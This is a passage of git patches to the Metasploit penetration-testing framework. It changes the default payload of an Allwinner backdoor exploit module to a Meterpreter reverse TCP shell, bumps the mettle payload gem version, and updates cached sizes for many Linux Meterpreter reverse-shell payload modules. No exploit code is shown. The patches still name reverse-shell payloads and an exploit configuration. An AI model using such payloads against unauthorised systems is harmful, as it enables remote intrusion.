a/modules/exploits/multi/local/allwinner_backdoor.rb +++ b/modules/exploits/multi/local/allwinner_backdoor.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require "msf/core" - class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking @@ -35,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Local "Platform" => [ "android", "linux" ], "DisclosureDate" => "Apr 30 2016", "DefaultOptions" => { - "payload" => "linux/armle/mettle/reverse_tcp" + "payload" => "linux/armle/meterpreter/reverse_tcp" }, "Privileged" => true, "Arch" => ARCH_ARMLE, From 7c11e0065dd0b6e609e31807af69d795909e73ea Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 26 Apr 2017 18:00:50 -0500 Subject: [PATCH 6/7] update mettle --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 006ba6c495..96e2f0ec34 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -46,7 +46,7 @@ PATH metasploit-model metasploit-payloads (= 1.2.24) metasploit_data_models - metasploit_payloads-mettle (= 0.1.8) + metasploit_payloads-mettle (= 0.1.9) msgpack nessus_rest net-ssh @@ -233,7 +233,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.1.8) + metasploit_payloads-mettle (0.1.9) mime-types (3.1) mime-types-data (~> 3.2015) mime-types-data (3.2016.0521) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index b72f48153b..8d04309da2 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -67,7 +67,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.2.24' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.8' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.9' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 480a0b4273e5e853e38d3ea9661cd95c4c41c91b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 26 Apr 2017 18:02:14 -0500 Subject: [PATCH 7/7] update payload sizes --- .../payloads/singles/linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb | 2 +- 24 files changed, 24 insertions(+), 24 deletions(-) diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index de51b8ac8f..b7a6ca97c7 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 646808 + CachedSize = 650024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index eed97cb69c..776a0426f4 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 646808 + CachedSize = 650024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 8ca59fe4d0..a7f546bc9a 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 646808 + CachedSize = 650024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index c1e17751ff..1b0d8eb5d3 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 639520 + CachedSize = 642304 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index fc35312f1a..505a2331bb 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 639520 + CachedSize = 642304 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 5ee0c63881..59589b16d8 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 639520 + CachedSize = 642304 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 676228da47..121a74192e 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 638320 + CachedSize = 641064 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index 45e065ce68..9efd3163dc 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 638320 + CachedSize = 641064 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index bbc1472a37..2b502807d0 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 638320 + CachedSize = 641064 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 1fb23e0ba5..bb3df3f2ae 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1019344 + CachedSize = 1023816 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index cca7335f5f..6d518cce06 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1019344 + CachedSize = 1023816 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index a4e2037ae9..6966468f86 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1019344 + CachedSize = 1023816 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index da77150e78..82dde575dc 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 997900 + CachedSize = 1002328 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index 186eec725c..95e367a69d 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 997900 + CachedSize = 1002328 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index e4d453a55c..e2a9bf891f 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 997900 + CachedSize = 1002328 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index cad8178fa2..661f405c2f 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 997996 + CachedSize = 1002424 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index a2cbb51c1a..a884d7486d 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 997996 + CachedSize = 1002424 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index d575313a72..dd08d2ecfa 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 997996 + CachedSize = 1002424 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 4e16a425c8..67da838251 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 739644 + CachedSize = 743740 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index a8f346b575..baef1d8db0 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 739644 + CachedSize = 743740 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 035a13fcb2..96a94d4fb1 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 739644 + CachedSize = 743740 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index 8f85d9d377..7ffff62493 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 864336 + CachedSize = 864376 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 479cdb1b8d..24fccb538f 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 864336 + CachedSize = 864376 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 84e533fe8d..ae3216eee1 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 864336 + CachedSize = 864376 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions